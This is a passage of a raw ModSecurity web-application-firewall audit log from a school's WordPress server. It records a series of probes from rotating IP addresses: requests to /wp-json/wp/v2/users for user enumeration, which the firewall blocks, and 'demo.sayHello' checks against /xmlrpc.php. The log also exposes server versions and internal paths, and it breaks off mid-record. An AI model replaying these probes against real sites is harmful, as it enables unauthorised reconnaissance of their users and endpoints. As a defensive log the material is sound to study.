156.228.116.248 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.116.248 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --2ef20e06-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2ef20e06-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747427016837892 3434 (- - -) Stopwatch2: 1747427016837892 3434; combined=1471, p1=509, p2=931, p3=0, p4=0, p5=31, sr=100, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2ef20e06-Z-- --efb9b77a-A-- [17/May/2025:03:23:44 +0700] aCee0Ne6THFz1hsaJaLZWgAAABQ 103.236.140.4 54950 103.236.140.4 8181 --efb9b77a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.116.248 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.116.248 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --efb9b77a-C-- demo.sayHello --efb9b77a-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --efb9b77a-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747427024804676 5186 (- - -) Stopwatch2: 1747427024804676 5186; combined=3899, p1=513, p2=3172, p3=29, p4=32, p5=91, sr=71, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --efb9b77a-Z-- --4be82d79-A-- [17/May/2025:03:24:04 +0700] aCee5Me47ocjCGWTS4Y_TgAAAE8 103.236.140.4 54954 103.236.140.4 8181 --4be82d79-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.171.44 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.171.44 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --4be82d79-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4be82d79-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747427044678000 2858 (- - -) Stopwatch2: 1747427044678000 2858; combined=1329, p1=440, p2=859, p3=0, p4=0, p5=30, sr=89, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4be82d79-Z-- --3cfa5628-A-- [17/May/2025:03:24:09 +0700] aCee6dhEtho3ciA0weheigAAAIw 103.236.140.4 54958 103.236.140.4 8181 --3cfa5628-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.171.44 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.171.44 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --3cfa5628-C-- demo.sayHello --3cfa5628-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --3cfa5628-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747427049811293 5322 (- - -) Stopwatch2: 1747427049811293 5322; combined=3969, p1=503, p2=3251, p3=28, p4=32, p5=92, sr=74, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3cfa5628-Z-- --0ee22159-A-- [17/May/2025:03:24:34 +0700] aCefAkE0LfP59mkCzg42HwAAAM4 103.236.140.4 54966 103.236.140.4 8181 --0ee22159-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.240.99.248 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.240.99.248 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --0ee22159-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0ee22159-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747427074739826 2991 (- - -) Stopwatch2: 1747427074739826 2991; combined=1434, p1=484, p2=913, p3=0, p4=0, p5=37, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0ee22159-Z-- --a08f252c-A-- [17/May/2025:03:24:38 +0700] aCefBthEtho3ciA0wehejwAAAJY 103.236.140.4 54972 103.236.140.4 8181 --a08f252c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.240.99.248 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.240.99.248 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --a08f252c-C-- demo.sayHello --a08f252c-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --a08f252c-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747427078934674 4971 (- - -) Stopwatch2: 1747427078934674 4971; combined=3834, p1=437, p2=3133, p3=22, p4=25, p5=150, sr=65, sw=67, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a08f252c-Z-- --09897b02-A-- [17/May/2025:03:28:58 +0700] aCegCkE0LfP59mkCzg42LQAAAMc 103.236.140.4 55060 103.236.140.4 8181 --09897b02-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.185.217 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.185.217 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --09897b02-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --09897b02-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747427338198273 3582 (- - -) Stopwatch2: 1747427338198273 3582; combined=1561, p1=556, p2=968, p3=0, p4=0, p5=37, sr=150, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --09897b02-Z-- --a8c1644d-A-- [17/May/2025:03:29:04 +0700] aCegENe6THFz1hsaJaLZYQAAAAs 103.236.140.4 55068 103.236.140.4 8181 --a8c1644d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.185.217 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.185.217 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --a8c1644d-C-- demo.sayHello --a8c1644d-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --a8c1644d-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747427344327552 5548 (- - -) Stopwatch2: 1747427344327552 5548; combined=4224, p1=557, p2=3453, p3=30, p4=34, p5=89, sr=71, sw=61, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a8c1644d-Z-- --9053bf6c-A-- [17/May/2025:03:29:52 +0700] aCegQMe47ocjCGWTS4Y_XwAAAFY 103.236.140.4 55116 103.236.140.4 8181 --9053bf6c-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.86.111 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.86.111 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --9053bf6c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9053bf6c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747427392055088 2782 (- - -) Stopwatch2: 1747427392055088 2782; combined=1390, p1=509, p2=846, p3=0, p4=0, p5=34, sr=79, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9053bf6c-Z-- --43204047-A-- [17/May/2025:03:29:56 +0700] aCegREE0LfP59mkCzg42NgAAANA 103.236.140.4 55126 103.236.140.4 8181 --43204047-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.86.111 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.86.111 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --43204047-C-- demo.sayHello --43204047-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --43204047-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747427396869520 5139 (- - -) Stopwatch2: 1747427396869520 5139; combined=3886, p1=487, p2=3186, p3=30, p4=32, p5=90, sr=69, sw=61, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --43204047-Z-- --d74d4164-A-- [17/May/2025:03:30:42 +0700] aCegcnyxdQCiyU1ENFchMAAAAAA 103.236.140.4 55192 103.236.140.4 8181 --d74d4164-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.77.200 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.77.200 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --d74d4164-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d74d4164-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747427442143344 8214 (- - -) Stopwatch2: 1747427442143344 8214; combined=1875, p1=861, p2=983, p3=0, p4=0, p5=31, sr=116, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d74d4164-Z-- --cb371458-A-- [17/May/2025:03:30:49 +0700] aCegeXyxdQCiyU1ENFchNAAAAAU 103.236.140.4 55202 103.236.140.4 8181 --cb371458-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.77.200 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.77.200 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --cb371458-C-- demo.sayHello --cb371458-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --cb371458-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747427449434636 4599 (- - -) Stopwatch2: 1747427449434636 4599; combined=3015, p1=443, p2=2408, p3=22, p4=25, p5=71, sr=56, sw=46, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cb371458-Z-- --bbe19b08-A-- [17/May/2025:03:31:35 +0700] aCegp3yxdQCiyU1ENFchQAAAAAQ 103.236.140.4 55244 103.236.140.4 8181 --bbe19b08-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.105.135 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.105.135 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --bbe19b08-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bbe19b08-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747427495966311 2886 (- - -) Stopwatch2: 1747427495966311 2886; combined=1251, p1=437, p2=784, p3=0, p4=0, p5=30, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bbe19b08-Z-- --64ff3b22-A-- [17/May/2025:03:31:36 +0700] aCegqHyxdQCiyU1ENFchQQAAAAU 103.236.140.4 55246 103.236.140.4 8181 --64ff3b22-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.95.191 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.95.191 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --64ff3b22-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --64ff3b22-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747427496307315 2820 (- - -) Stopwatch2: 1747427496307315 2820; combined=1229, p1=426, p2=774, p3=0, p4=0, p5=29, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --64ff3b22-Z-- --863a5b5f-A-- [17/May/2025:03:31:39 +0700] aCegq3yxdQCiyU1ENFchQwAAAAg 103.236.140.4 55252 103.236.140.4 8181 --863a5b5f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.105.135 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.105.135 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --863a5b5f-C-- demo.sayHello --863a5b5f-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --863a5b5f-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747427499045493 5797 (- - -) Stopwatch2: 1747427499045493 5797; combined=4177, p1=553, p2=3388, p3=33, p4=31, p5=100, sr=76, sw=72, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --863a5b5f-Z-- --d940425e-A-- [17/May/2025:03:31:41 +0700] aCegrXyxdQCiyU1ENFchRAAAAAk 103.236.140.4 55254 103.236.140.4 8181 --d940425e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.95.191 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.95.191 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --d940425e-C-- demo.sayHello --d940425e-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --d940425e-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747427501232342 6238 (- - -) Stopwatch2: 1747427501232342 6238; combined=4552, p1=660, p2=3593, p3=34, p4=34, p5=130, sr=192, sw=101, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d940425e-Z-- --fcd2a52c-A-- [17/May/2025:03:32:17 +0700] aCeg0XyxdQCiyU1ENFchSQAAABI 103.236.140.4 55272 103.236.140.4 8181 --fcd2a52c-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.103.66 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.103.66 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --fcd2a52c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fcd2a52c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747427537625970 3639 (- - -) Stopwatch2: 1747427537625970 3639; combined=1505, p1=533, p2=940, p3=0, p4=0, p5=32, sr=87, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fcd2a52c-Z-- --76d37a40-A-- [17/May/2025:03:32:21 +0700] aCeg1XyxdQCiyU1ENFchSwAAABU 